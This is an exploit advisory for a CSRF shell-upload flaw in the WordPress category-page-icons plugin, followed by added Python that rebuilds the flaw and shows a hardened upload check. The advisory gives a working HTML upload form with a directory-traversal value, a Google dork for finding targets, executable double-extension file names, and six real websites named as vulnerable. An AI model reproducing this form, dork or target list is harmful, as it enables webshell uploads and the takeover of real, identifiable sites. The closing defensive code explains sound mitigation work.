WordPress category-page-icons Plugins 3.6.1 CSRF Backdoor Access Vulnerability

2019.01.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-434

####################################################################
# Exploit Title : WordPress category-page-icons Plugins 3.6.1 CSRF Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/01/2019
# Vendor Homepage :
#   wordpress.org
#   wp-premiumplugins.com/category-page-icons/
#   wordpress.org/plugins/category-page-icons/
# Software Download Link : github.com/wp-plugins/category-page-icons/archive/master.zip
# Software Vulnerable Code => [ wpdev-flash-uploader.php ]
#   plugins.svn.wordpress.org/category-page-icons/trunk/include/wpdev-flash-uploader.php
#   github.com/wp-plugins/category-page-icons/blob/master/include/wpdev-flash-uploader.php
# Version Information : Current Version 3.6.1 => + Requires at least: 2.7 - Tested up to: 3.6.1 - Stable tag: 0.9.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/category-page-icons/''
# Vulnerability Type :
#   CWE-264 [ Permissions, Privileges, and Access Controls ]
#   CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
#   CWE-98 [ Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') ]
# PacketStormSecurity Exploit Reference Link : packetstormsecurity.com/files/151193/WordPress-Category-Page-Icons-3.6.1-CSRF-Shell-Upload.html
####################################################################
WordPress category-page-icons Plugins 3.6.1 CSRF Backdoor Access Vulnerability
####################################################################
# Arbitrary File Upload/Shell Upload CSRF Exploit :
*********************************************

<form enctype="multipart/form-data" action="https://VULNERABLESITEHERE/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="post">
Your File: <input name="wpdev-async-upload" type="file" /><br />
<input type="hidden" name="dir_icons" value="../../../../">
<input type="submit" value="upload" />
</form>

# Note : the form posts the file straight to the plugin's uploader script ( no WordPress nonce is sent ). The client-supplied dir_icons value is used as the destination directory, so "../../../../" walks four levels up from the plugin folder and drops the file in the site root.
####################################################################
# Directory File Path :
*********************
SITE/[yourfilename.php.pjpg]
SITE/wp-content/[yourfilename.php.pjpg]

# Allowed File Extensions :
txt - jpg - gif - png - html.jpg - php.pjpg - asp;.gif - php;.gif - phtml

# Note : the non-image entries ( php.pjpg , php;.gif , asp;.gif , phtml ) only execute where the web server maps them to a script handler, e.g. Apache AddHandler treating any ".php" extension component as PHP, or older IIS truncating the name at ";". A stack that matches only on the final ".php" extension serves such uploads as static files, so verify execution rather than assume it.
####################################################################
# Example Vulnerable Sites :
*************************
[+] dtacmail.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
[+] dutary.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
[+] ddns2u.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
[+] inuse.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
[+] ceobible.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
[+] guruok.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
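The two weaknesses the advisory relies on are the unchecked dir_icons traversal and an extension allowlist that contains executable double extensions. The following Python is an added example written for this page; it is not the plugin's code and not part of the original advisory. vulnerable_target() is a reconstruction of the behaviour the advisory describes (not the plugin's actual logic), and hardened_target() shows the two checks a safe uploader needs: judge every dot-separated token of the name rather than only its tail, and resolve the destination and require it to stay under the upload root. WP_ROOT and ICON_DIR are assumed paths; the real install layout and upload directory are not shown on the page.

```python
import os
import posixpath
from urllib.parse import unquote

# Assumed install layout (hypothetical paths; the plugin's real upload
# directory is not given in the advisory).
WP_ROOT = "/var/www/html"
ICON_DIR = os.path.join(WP_ROOT, "wp-content", "plugins",
                        "category-page-icons", "include")

# Extension list exactly as the advisory reports it. "php.pjpg", "phtml" and
# the ";" variants are not image types: Apache AddHandler matches ".php" as
# any extension component and older IIS truncates names at ";", so they run.
ADVISORY_ALLOWED = ["txt", "jpg", "gif", "png", "html.jpg",
                    "php.pjpg", "asp;.gif", "php;.gif", "phtml"]

# Image types the hardened check accepts, judged on the LAST extension.
SAFE_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}
# Tokens that must not appear anywhere in the dotted name.
DANGEROUS_TOKENS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                    "asp", "aspx", "cgi", "pl", "sh", "html", "htm", "shtml",
                    "htaccess"}


def vulnerable_target(dir_icons, filename):
    """Reconstruction of the behaviour the advisory describes, NOT the
    plugin's code: the client's dir_icons is joined into the destination
    unchecked, and the name passes if it ends in any allowlist entry."""
    if not any(filename.lower().endswith("." + ext) for ext in ADVISORY_ALLOWED):
        return None
    return os.path.normpath(os.path.join(ICON_DIR, dir_icons, filename))


def hardened_target(dir_icons, filename):
    """Return the resolved destination path, or None to reject the upload.
    Safe regardless of how the web server maps extensions to handlers."""
    name = unquote(filename).replace("\x00", "")
    # Drop any client-supplied directory part, whichever separator was used.
    name = posixpath.basename(name.replace("\\", "/"))
    if not name or name.startswith(".") or ";" in name or ":" in name:
        return None
    tokens = name.lower().split(".")
    if len(tokens) < 2 or tokens[-1] not in SAFE_EXTENSIONS:
        return None
    if any(tok in DANGEROUS_TOKENS for tok in tokens[:-1]):
        return None
    # Resolve the requested subdirectory and insist it stays under ICON_DIR.
    base = os.path.realpath(ICON_DIR)
    sub = dir_icons.replace("\x00", "")
    dest_dir = os.path.realpath(os.path.join(base, sub))
    if dest_dir != base and not dest_dir.startswith(base + os.sep):
        return None
    return os.path.join(dest_dir, name)


if __name__ == "__main__":
    # The advisory's request: four levels up, double-extension name.
    print(vulnerable_target("../../../../", "shell.php.pjpg"))  # lands in WP_ROOT
    print(hardened_target("../../../../", "shell.php.pjpg"))    # None
    print(hardened_target("", "shell.php.pjpg"))                # None
    print(hardened_target("", "icon.png"))                      # inside ICON_DIR
```

The realpath containment check is what defeats dir_icons regardless of how many "../" segments or encoded variants the client sends; the per-token name check is what makes the result independent of server configuration, since a name like shell.php.pjpg is refused before any handler mapping matters.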

